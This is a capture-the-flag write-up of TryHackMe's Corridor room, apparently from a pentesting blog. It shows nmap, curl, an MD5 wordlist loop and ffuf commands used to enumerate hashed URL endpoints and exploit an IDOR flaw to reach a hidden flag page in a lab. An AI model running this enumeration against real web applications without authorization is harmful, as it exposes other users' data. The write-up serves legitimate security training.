Corridor Writeup – TryHackMe IDOR Challenge

CTF Writeups & Bug Bounty » Try Hack Me » THM Challenges » Corridor Writeup – TryHackMe IDOR Challenge

This post provides a full walkthrough of the Corridor Challenge on TryHackMe. We find the flag by exploiting an IDOR vulnerability (Insecure Direct Object Reference) through an ID hashed with MD5 in the URL of the web app.

» Link to the room on TryHackMe

Table of Contents

Introduction – Corridor
Recon
- Discovering the Corridor web app
- Understanding the potential IDOR
Exploiting the IDOR to get the Flag
Final Thoughts on Corridor from TryHackMe
Disclaimer

Introduction – Corridor

The challenge description is very explicit:

In this challenge, you will explore potential IDOR vulnerabilities. Examine the URL endpoints you access as you navigate the website and note the hexadecimal values you find (they look an awful lot like a hash, don't they?). This could help you uncover website locations you were not expected to access.

So there must be something to do with an IDOR vulnerability and hash values…

Let’s solve this, shall we?

Recon

Discovering the Corridor web app

After a simple nmap TCP scan, we only detect a web app running on the target:

nmap -sS -sV -p- -Pn --disable-arp-ping -T5 10.80.164.180
[...]
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Werkzeug httpd 2.0.3 (Python 3.10.2)

nmap options:

-sS: TCP SYN scan method
-sV: nmap will use the relevant scripts to detect versions of the running services
-p-: scans all ports from 1 to 65535
-Pn and –disable-arp-ping: disables the ping that nmap does by default to the target
-T5: caps the scan delay to 5ms per port

With a simple curl request, we can inspect the source code of the index page of this web app:

curl -skLi 10.80.164.180
[...]
<img src="/static/img/corridor.png" usemap="#image-map">

    <map name="image-map">
        <area target="" alt="c4ca4238a0b923820dcc509a6f75849b" title="c4ca4238a0b923820dcc509a6f75849b" href="c4ca4238a0b923820dcc509a6f75849b" coords="257,893,258,332,325,351,325,860" shape="poly">
[...]
        <area target="" alt="c51ce410c124a10e0db5e4b97fc2af39" title="c51ce410c124a10e0db5e4b97fc2af39" href="c51ce410c124a10e0db5e4b97fc2af39" coords="1073,609,1081,620,1082,459,1073,463" shape="poly">
    </map>

curl options:

-s: silent mode
-k: allows insecure connections
-L: follows redirections
-i: shows response HTTP headers

Mmhh…

The alt, title and href attributes of the <area> HTML tags are suspicious…

Understanding the potential IDOR

In fact, they have the exact format of MD5 hashes.

With a quick search online we find that they are the MD5 hashes of digits 1, 2, 3, etc. Quick check with the Linux md5sum command:

echo -n 1 | md5sum
c4ca4238a0b923820dcc509a6f75849b  -

echo -n 13 | md5sum
c51ce410c124a10e0db5e4b97fc2af39

Yeah, we have the same values that were found in the source code.

Adding any of those MD5 hashes to the URL gives us a HTTP 200 OK response:

curl -skLi 10.80.164.180/c51ce410c124a10e0db5e4b97fc2af39
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 632
Server: Werkzeug/2.0.3 Python/3.10.2
Date: Tue, 03 Feb 2026 15:13:48 GMT
[...]

So these hashes are used by the server to return content, and we know how they are calculated (simple MD5 hashes of consecutive numbers).

What if we could try other endpoints, beyond the number 13?

What if the MD5 hash of number 20 returns a “hidden” response?

Exploiting the IDOR to get the Flag

With this knowledge, we know our task: enumerate the endpoints using the consecutive MD5 hashes of many numbers.

We’ll go from 0 to 10,000.

To do so, we must create the wordlist containing the MD5 hashes of those 10,001 numbers.

Here is the command I came up with:

for i in $(seq 0 10000); do echo -n $i | md5sum | awk '{print $1}'; done > /tmp/md5fuzz

It uses seq to generate numbers from 0 to 10,000 then a combination of md5sum and awk to compute and extract the MD5 hash of each number. The output is redirected into the /tmp/md5fuzz file.

Now, let’s try each of those MD5 hashes as endpoints with ffuf:

ffuf -w /tmp/md5fuzz -u "http://10.80.164.180/FUZZ" -mc all -fc 404
[...]
e4da3b7fbbce2345d7772b0674a318d5 [Status: 200, Size: 632, Words: 72, Lines: 24]
6512bd43d9caa6e02c990b0a82652dca [Status: 200, Size: 632, Words: 72, Lines: 24]
c20ad4d76fe97759aa27a0c99bff6710 [Status: 200, Size: 632, Words: 72, Lines: 24]
c81e728d9d4c2f636f067f89cc14862c [Status: 200, Size: 632, Words: 72, Lines: 24]
1679091c5a880faf6fb5e6087eb1b2dc [Status: 200, Size: 632, Words: 72, Lines: 24]
8f14e45fceea167a5a36dedd4bea2543 [Status: 200, Size: 632, Words: 72, Lines: 24]
a87ff679a2f3e71d9181a67b7542122c [Status: 200, Size: 632, Words: 72, Lines: 24]
c51ce410c124a10e0db5e4b97fc2af39 [Status: 200, Size: 632, Words: 72, Lines: 24]
eccbc87e4b5ce2fe28308fd9f2a7baf3 [Status: 200, Size: 632, Words: 72, Lines: 24]
cfcd208495d565ef66e7dff9f98764da [Status: 200, Size: 797, Words: 121, Lines: 34]
c9f0f895fb98ab9159f51fd0297e236d [Status: 200, Size: 632, Words: 72, Lines: 24]
45c48cce2e2d7fbdea1afc51c7c6ad26 [Status: 200, Size: 632, Words: 72, Lines: 24]
d3d9446802a44259755d38e6d163e820 [Status: 200, Size: 632, Words: 72, Lines: 24]
c4ca4238a0b923820dcc509a6f75849b [Status: 200, Size: 632, Words: 72, Lines: 24]

ffuf options:

-w: wordlist
-u: target URL
-mc all -fc 404: treats all server responses as successful responses except for 404 NOT FOUND

In total, we have 14 valid MD5 hashes.

Notice that one of them returns a content where the size is 797, different from the other sizes of 632.

Let’s get this endpoint:

curl -skLi 10.80.164.180/cfcd208495d565ef66e7dff9f98764da

<h1>
    flag{2477ef0**************************}
</h1>

Yeah, that’s the flag!

Final Thoughts on Corridor from TryHackMe

Corridor is an easy IDOR challenge, and it still required a bit of thinking, it wasn’t a blatant IDOR in the URL with setups like “/?id=1”.

I hope you enjoyed this walkthrough! Flags are hidden so you have to do it and learn by yourself 🙂

Read more THM Writeups on pentestguides.com:

Solving Lookup – TryHackMe Challenge WriteupFebruary 12, 2026
Solving Basic Pentesting – TryHackMe Challenge WriteupFebruary 11, 2026
RootMe Writeup – Full TryHackMe CTF SolutionFebruary 8, 2026
Corridor Writeup – TryHackMe IDOR ChallengeFebruary 7, 2026
Lo-Fi Writeup on TryHackMe – File InclusionFebruary 6, 2026

Disclaimer

This article is provided for educational purposes only.

All techniques demonstrated were performed in a controlled lab environment.

Do not attempt to reproduce these actions on systems you do not own or have explicit authorization to test.

I do not encourage or take responsibility for any illegal use of the information provided.